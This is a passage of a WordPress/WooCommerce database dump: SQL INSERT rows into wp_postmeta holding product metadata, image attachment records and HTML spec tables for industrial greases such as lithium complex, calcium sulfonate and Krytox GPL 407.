INSERT INTO `wp_postmeta` VALUES (12671, 1102, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12672, 1102, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (12673, 1102, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12674, 1102, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12675, 1102, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (12676, 1102, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12677, 1102, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12678, 1102, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (12679, 1102, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12680, 1102, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12681, 1102, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (12682, 1102, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (12683, 1102, '_product_image_gallery', '1807,1817'); 
INSERT INTO `wp_postmeta` VALUES (12684, 1104, '_edit_lock', '1482334516:2'); 
INSERT INTO `wp_postmeta` VALUES (12685, 1104, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (12686, 1105, '_wp_attached_file', '2016/08/shutterstock_318689024.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12687, 1105, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5760;s:6:"height";i:3840;s:4:"file";s:34:"2016/08/shutterstock_318689024.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_318689024-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_318689024-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_318689024-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_318689024-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_318689024-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_318689024-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_318689024-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_318689024-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12688, 1104, '_thumbnail_id', '1105'); 
INSERT INTO `wp_postmeta` VALUES (12689, 1104, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (12690, 1104, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (12691, 1104, '312_default_editor', '<table width="426">\r\n<tbody>\r\n<tr>\r\n<td width="202">Typical Properties</td>\r\n<td style="text-align: center;" width="224">TSS</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range</td>\r\n<td style="text-align: center;">-40°F to 350°F</td>\r\n</tr>\r\n<tr>\r\n<td>Thickener</td>\r\n<td style="text-align: center;">Overbased Calcium Sulfonate</td>\r\n</tr>\r\n<tr>\r\n<td>NLGI Grade</td>\r\n<td style="text-align: center;">2</td>\r\n</tr>\r\n<tr>\r\n<td>Texture</td>\r\n<td style="text-align: center;">Buttery with Light Tack</td>\r\n</tr>\r\n<tr>\r\n<td>Color</td>\r\n<td style="text-align: center;">Red</td>\r\n</tr>\r\n<tr>\r\n<td>Odor</td>\r\n<td style="text-align: center;">Mild Petroleum</td>\r\n</tr>\r\n<tr>\r\n<td>Solubility in Water</td>\r\n<td style="text-align: center;">Insoluble</td>\r\n</tr>\r\n<tr>\r\n<td>Dropping Point</td>\r\n<td style="text-align: center;">572°F</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity SUS @ 100°F</td>\r\n<td style="text-align: center;">2600</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity SUS @ 210°F</td>\r\n<td style="text-align: center;">156</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Viscosity Index, Min</td>\r\n<td style="text-align: center;">90</td>\r\n</tr>\r\n<tr>\r\n<td>Timken OK Load</td>\r\n<td style="text-align: center;">65</td>\r\n</tr>\r\n<tr>\r\n<td>Weld Point, kg</td>\r\n<td style="text-align: center;">500</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (12692, 1104, '716_default_editor', '<ul>\r\n 	<li>High Temperature Bearings</li>\r\n 	<li>Bushings</li>\r\n 	<li>Gear Couplings</li>\r\n 	<li>Steel Mill Equipment</li>\r\n 	<li>High Temperature Equipment</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (12693, 1104, '719_default_editor', '<ul>\r\n 	<li>ASTM D217</li>\r\n 	<li>ASTM D566</li>\r\n 	<li>ASTM D1743</li>\r\n 	<li>ASTM D2266</li>\r\n 	<li>ASTM D2509</li>\r\n 	<li>ASTM D1264</li>\r\n 	<li>ASTM D1263</li>\r\n 	<li>ASTM D1742</li>\r\n 	<li>ASTM D1831</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (12694, 1104, '317_default_editor', '<table width="667">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="202">Cartridge</td>\r\n<td style="text-align: center;" width="224">Tub</td>\r\n<td style="text-align: center;" width="241">Pail</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">1-</td>\r\n<td style="text-align: center;">16 oz.</td>\r\n<td style="text-align: center;">35 lb</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (12695, 1104, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (12696, 1104, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (12697, 1104, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12698, 1104, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12699, 1104, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (12700, 1104, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12701, 1104, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (12702, 1104, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (12703, 1104, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (12704, 1104, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (12705, 1104, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (12706, 1104, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12707, 1104, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12708, 1104, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12709, 1104, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (12710, 1104, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (12711, 1104, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12712, 1104, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (12713, 1104, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12714, 1104, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12715, 1104, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (12716, 1104, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12717, 1104, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12718, 1104, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (12719, 1104, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12720, 1104, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12721, 1104, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (12722, 1104, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (12723, 1104, '_product_image_gallery', '1810,1818'); 
INSERT INTO `wp_postmeta` VALUES (12724, 1104, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (12725, 1106, '_edit_lock', '1482335494:2'); 
INSERT INTO `wp_postmeta` VALUES (12726, 1106, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (12727, 1107, '_wp_attached_file', '2016/08/shutterstock_27998426.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12728, 1107, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3504;s:6:"height";i:2336;s:4:"file";s:33:"2016/08/shutterstock_27998426.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"shutterstock_27998426-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"shutterstock_27998426-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"shutterstock_27998426-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_27998426-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_27998426-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_27998426-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"shutterstock_27998426-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"shutterstock_27998426-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12729, 1106, '_thumbnail_id', '1107'); 
INSERT INTO `wp_postmeta` VALUES (12730, 1106, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (12731, 1106, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (12732, 1106, '312_default_editor', '<table width="426">\r\n<tbody>\r\n<tr>\r\n<td width="202">Typical Properties</td>\r\n<td style="text-align: center;" width="224">TWL</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range</td>\r\n<td style="text-align: center;">-40°F to 350°F</td>\r\n</tr>\r\n<tr>\r\n<td>Thickener</td>\r\n<td style="text-align: center;">Lithium Complex</td>\r\n</tr>\r\n<tr>\r\n<td>NLGI Grade</td>\r\n<td style="text-align: center;">2</td>\r\n</tr>\r\n<tr>\r\n<td>Texture</td>\r\n<td style="text-align: center;">Smooth/Buttery</td>\r\n</tr>\r\n<tr>\r\n<td>Color</td>\r\n<td style="text-align: center;">White</td>\r\n</tr>\r\n<tr>\r\n<td>Odor</td>\r\n<td style="text-align: center;">Mild Petroleum</td>\r\n</tr>\r\n<tr>\r\n<td>Solubility in Water</td>\r\n<td style="text-align: center;">Insoluble</td>\r\n</tr>\r\n<tr>\r\n<td>Dropping Point</td>\r\n<td style="text-align: center;">500°F</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity SUS @ 100°F</td>\r\n<td style="text-align: center;">735-950</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity SUS @ 210°F</td>\r\n<td style="text-align: center;">73.5-86</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity cSt @ 40°F</td>\r\n<td style="text-align: center;">140-180</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity cSt @ 100°F</td>\r\n<td style="text-align: center;">13.5-16.5</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity Index, Min</td>\r\n<td style="text-align: center;">90</td>\r\n</tr>\r\n<tr>\r\n<td>Timken OK Load lbs</td>\r\n<td style="text-align: center;">50</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (12733, 1106, '716_default_editor', '<ul>\r\n 	<li>Chassis</li>\r\n 	<li>Seat Tracks</li>\r\n 	<li>Speedometer Cables</li>\r\n 	<li>Trunk &amp; Hood Latches</li>\r\n 	<li>Door Hinges</li>\r\n 	<li>Stop Latches</li>\r\n 	<li>Assembly Applications</li>\r\n 	<li>Garage Doors</li>\r\n 	<li>Conveyor Bearings</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (12734, 1106, '719_default_editor', '<ul>\r\n 	<li>ASTM D217</li>\r\n 	<li>ASTM D2265</li>\r\n 	<li>ASTM D4290</li>\r\n 	<li>ASTM D1743</li>\r\n 	<li>ASTM D1264</li>\r\n 	<li>ASTM D4048</li>\r\n 	<li>ASTM D2266</li>\r\n 	<li>ASTM D2596</li>\r\n 	<li>ASTM D942</li>\r\n 	<li>ASTM D2509</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (12735, 1106, '317_default_editor', '<table width="689">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="202">Cartridge</td>\r\n<td style="text-align: center;" width="224">Tub</td>\r\n<td style="text-align: center;" width="263">Pail</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">1-</td>\r\n<td style="text-align: center;">16 oz.</td>\r\n<td style="text-align: center;">35 lb</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (12736, 1106, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (12737, 1106, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (12738, 1106, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12739, 1106, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12740, 1106, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (12741, 1106, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12742, 1106, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (12743, 1106, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (12744, 1106, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (12745, 1106, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (12746, 1106, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (12747, 1106, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12748, 1106, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12749, 1106, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12750, 1106, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (12751, 1106, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (12752, 1106, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12753, 1106, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (12754, 1106, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12755, 1106, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12756, 1106, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (12757, 1106, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12758, 1106, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12759, 1106, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (12760, 1106, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12761, 1106, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12762, 1106, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (12763, 1106, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (12764, 1106, '_product_image_gallery', '1811,1813,1812'); 
INSERT INTO `wp_postmeta` VALUES (12765, 1109, '_wp_attached_file', '2016/08/tribosys_grease1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12766, 1109, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3872;s:6:"height";i:2592;s:4:"file";s:28:"2016/08/tribosys_grease1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:28:"tribosys_grease1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:28:"tribosys_grease1-800x536.jpg";s:5:"width";i:800;s:6:"height";i:536;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:28:"tribosys_grease1-768x514.jpg";s:5:"width";i:768;s:6:"height";i:514;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:30:"tribosys_grease1-1600x1071.jpg";s:5:"width";i:1600;s:6:"height";i:1071;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:28:"tribosys_grease1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:28:"tribosys_grease1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:28:"tribosys_grease1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:28:"tribosys_grease1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12767, 1088, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (12768, 1111, '_edit_lock', '1475594381:2'); 
INSERT INTO `wp_postmeta` VALUES (12769, 1111, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (12770, 1112, '_wp_attached_file', '2016/08/krytox-gpl-grease-high-temp.jpg'); 
INSERT INTO `wp_postmeta` VALUES (12771, 1112, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3250;s:6:"height";i:2123;s:4:"file";s:39:"2016/08/krytox-gpl-grease-high-temp.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"krytox-gpl-grease-high-temp-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"krytox-gpl-grease-high-temp-800x523.jpg";s:5:"width";i:800;s:6:"height";i:523;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"krytox-gpl-grease-high-temp-768x502.jpg";s:5:"width";i:768;s:6:"height";i:502;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:41:"krytox-gpl-grease-high-temp-1600x1045.jpg";s:5:"width";i:1600;s:6:"height";i:1045;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"krytox-gpl-grease-high-temp-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"krytox-gpl-grease-high-temp-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"krytox-gpl-grease-high-temp-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"krytox-gpl-grease-high-temp-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (12772, 1111, '_thumbnail_id', '1112'); 
INSERT INTO `wp_postmeta` VALUES (12773, 1111, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (12774, 1111, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (12775, 1111, '312_default_editor', '<table width="426">\r\n<tbody>\r\n<tr>\r\n<td width="202">Typical Properties</td>\r\n<td style="text-align: center;" width="224">GPL 407</td>\r\n</tr>\r\n<tr>\r\n<td>NLGI Grade</td>\r\n<td style="text-align: center;">2</td>\r\n</tr>\r\n<tr>\r\n<td>Temperature Range</td>\r\n<td style="text-align: center;">Up to 399°C (750°F)</td>\r\n</tr>\r\n<tr>\r\n<td>Base Oil Viscosity, cSt</td>\r\n<td style="text-align: center;"></td>\r\n</tr>\r\n<tr>\r\n<td>20 °C (68 °F)</td>\r\n<td style="text-align: center;">1600</td>\r\n</tr>\r\n<tr>\r\n<td>40 °C (104 °F)</td>\r\n<td style="text-align: center;">440</td>\r\n</tr>\r\n<tr>\r\n<td>100 °C (212 °F)</td>\r\n<td style="text-align: center;">42</td>\r\n</tr>\r\n<tr>\r\n<td>204 °C (400 °F)</td>\r\n<td style="text-align: center;">6</td>\r\n</tr>\r\n<tr>\r\n<td>260 °C (500 °F)</td>\r\n<td style="text-align: center;">3</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (12776, 1111, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Rollers</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>Bushings</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (12777, 1111, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (12778, 1111, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">Syringe</p>\r\n</td>\r\n<td style="text-align: center;" width="125">Tube</td>\r\n<td style="text-align: center;" width="125">Jar</td>\r\n<td style="text-align: center;" width="125">Cartridge</td>\r\n<td width="125">\r\n<p style="text-align: center;">Pail</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125">&nbsp;</td>\r\n<td width="125">\r\n<p style="text-align: center;">7 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125">&nbsp;</td>\r\n<td style="text-align: center;" width="125">&nbsp;</td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (12779, 1111, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (12780, 1111, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (12781, 1111, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12782, 1111, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12783, 1111, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (12784, 1111, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12785, 1111, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (12786, 1111, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (12787, 1111, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (12788, 1111, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (12789, 1111, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (12790, 1111, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12791, 1111, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12792, 1111, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12793, 1111, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (12794, 1111, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (12795, 1111, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (12796, 1111, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (12797, 1111, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12798, 1111, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12799, 1111, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (12800, 1111, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12801, 1111, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (12802, 1111, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (12803, 1111, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12804, 1111, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12805, 1111, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (12806, 1111, '_ywtm_title_tab_description', ''); 
INSERT INTO `wp_postmeta` VALUES (12807, 1111, '_ywtm_content_tab_description', ''); 
INSERT INTO `wp_postmeta` VALUES (12808, 1111, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12809, 1111, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (12810, 1111, '_ywtm_priority_tab_reviews', '30'); 
